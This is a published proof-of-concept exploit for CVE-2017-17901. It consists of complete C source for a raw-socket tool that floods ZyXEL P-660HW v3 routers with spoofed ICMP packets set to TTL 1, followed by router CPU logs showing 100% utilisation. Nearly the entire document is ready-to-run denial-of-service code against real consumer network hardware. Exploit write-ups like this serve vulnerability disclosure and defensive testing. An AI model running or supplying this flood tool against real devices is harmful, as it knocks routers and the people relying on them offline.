################ #Exploit Title: ZyXEL TTL Expiry Denial of Service CVE: CVE-2017-17901 #CWE: CWE-400 #Exploit Author: Hosein Askari #Vendor HomePage: https://www.zyxel.com/ #Version : v3 #Tested on: ZyXEL P-660HW #Category: Network Appliance #Author Mail : hosein.askari@aol.com #description: According to RFC 791, the router should destroy any datagram with value of less than or equal to one. ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (CPU consumption) via a flood of IP packets with a TTL of 1. ##################### #include <sys/socket.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <sys/time.h> #include <pwd.h> #include <time.h> #include <sys/utsname.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/igmp.h> void banner(void) { printf("TTL Expiry ZyXEL\n"); printf("Author: Hosein Askari"); } void usage(const char *progname) { printf("use : ./ZeXEL RouterIP count\n"); } int attack( const char *name, unsigned int port, struct sockaddr_in *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family = AF_INET; addr->sin_addr.s_addr = inet_addr(name); if (addr->sin_addr.s_addr == -1) { if (( host = gethostbyname(name) ) == NULL ) { fprintf(stderr,"unknown host\n",name); return(-1); } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port = htons(port); return(0); } unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *j = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *j++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)j ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int func(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl = 5; ip->version = 4; ip->tos = 4; ip->id = htons(1234); ip->frag_off = htons(0x2000); ip->tot_len = 0; ip->ttl = 1; ip->protocol = IPPROTO_ICMP; ip->saddr = rand() % 446674540; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = rand() % 18; icmp->code = rand() % 15; icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } free(packet); return(0); } int main(int argc, char **argv) { struct sockaddr_in dest_addr; unsigned int i,sock; unsigned long src_addr; banner(); if ((argc != 3)) { usage(argv[0]); return(-1); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"run with root privilege\n"); return(-1); } src_addr = dest_addr.sin_addr.s_addr; if (attack(argv[1],0,&dest_addr) == -1) { return(-1); } for (i = 0;i < atoi(argv[2]);i++) { if (func(sock,rand() % 4000000,&dest_addr) == -1) { fprintf(stderr,"Error\n"); return(-1); } } } #################### ras> sys cpu display CPU usage status: baseline 2106307 ticks sec ticks util sec ticks util sec ticks util sec ticks util 0 1712258 18.70 1 1730816 17.82 2 1738596 17.45 3 1715513 18.55 4 1529073 27.40 5 0 100.00 6 0 100.00 7 0 100.00 8 0 100.00 9 0 100.00 10 177665 91.56 11 1418797 32.64 12 0 100.00 13 0 100.00 14 0 100.00 15 0 100.00 16 0 100.00 17 0 100.00 18 0 100.00 19 0 100.00 20 0 100.00 21 0 100.00 22 0 100.00 23 0 100.00 24 0 100.00 25 0 100.00 26 0 100.00 27 0 100.00 28 0 100.00 29 0 100.00 30 0 100.00 31 0 100.00 32 0 100.00 33 0 100.00 34 0 100.00 35 0 100.00 36 0 100.00 37 0 100.00 38 0 100.00 39 0 100.00 40 0 100.00 41 0 100.00 42 0 100.00 43 0 100.00 44 0 100.00 45 0 100.00 46 0 100.00 47 0 100.00 48 0 100.00 49 0 100.00 50 0 100.00 51 0 100.00 52 0 100.00 53 0 100.00 54 0 100.00 55 0 100.00 56 0 100.00 57 0 100.00 58 0 100.00 59 0 100.00 60 758577 63.98 61 700450 66.74 62 0 100.00